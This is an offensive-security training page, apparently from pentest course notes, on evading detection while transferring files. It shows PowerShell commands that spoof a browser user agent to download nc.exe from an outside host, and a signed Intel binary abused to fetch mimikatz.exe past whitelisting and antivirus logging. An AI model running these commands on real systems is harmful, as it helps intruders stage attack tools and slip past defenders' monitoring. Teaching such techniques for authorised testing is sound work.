# Evade Detection *** ### πŸ•΅οΈ Evading Detection – Blending in With the Crowd **Good attackers hide. Great ones blend in.**\ If your transfer techniques are getting flagged, it’s time to get stealthy. Let’s explore how to **evade detection** by: * πŸ› οΈ Modifying user agents * πŸ₯· Leveraging LOLBins and GTFOBins * πŸ€– Using trusted binaries to download files *** ### 🦑 1. Changing User-Agent Strings Many defenders watch for user-agents like `curl/7.68.0`, `PowerShell/5.1.14393`, or `Microsoft BITS/7.8`. Luckily, **PowerShell's `Invoke-WebRequest`** supports **custom User-Agent strings**. 🎭 *** #### πŸ§ͺ List Built-In PowerShell User Agents {% code overflow="wrap" %} ```powershell [Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl ``` {% endcode %} You’ll see options like: * `Chrome`: `Mozilla/5.0 ... Chrome/7.0.500.0` * `Firefox`: `Gecko/20100401 Firefox/4.0` * `Safari`: `AppleWebKit/533.16` *** #### 🧠 Use a Fake Chrome User-Agent ```powershell $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe" ``` πŸ“‘ The server will log: ``` User-Agent: Mozilla/5.0 ... Chrome/7.0.500.0 Safari/534.6 ``` βœ… Much less suspicious than `WindowsPowerShell/5.1`. *** ### 🧬 2. Living Off the Land – LOLBins & GTFOBins When you're blocked from using PowerShell, Netcat, or external tools, turn to **trusted system binaries** β€” aka **LOLBins** πŸͺ€ These are binaries that: * βœ… Are **pre-installed** * βœ… Are **signed** by the vendor * βœ… Are **trusted** by application whitelisting solutions *** #### βš™οΈ Example: GfxDownloadWrapper.exe A legitimate Intel binary that can **download files** from the web: ```powershell GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe" ``` βœ… May bypass application whitelisting\ βœ… Could be excluded from AV logging or monitoring\ ❗ Found only on machines with Intel drivers *** #### πŸ”— Pro Resources * πŸͺŸ [LOLBAS Project](https://lolbas-project.github.io/) * 🐧 [GTFOBins Project](https://gtfobins.github.io/) > Tip: Use `+file-download` and `+file-upload` tags to discover binaries for your purpose. ***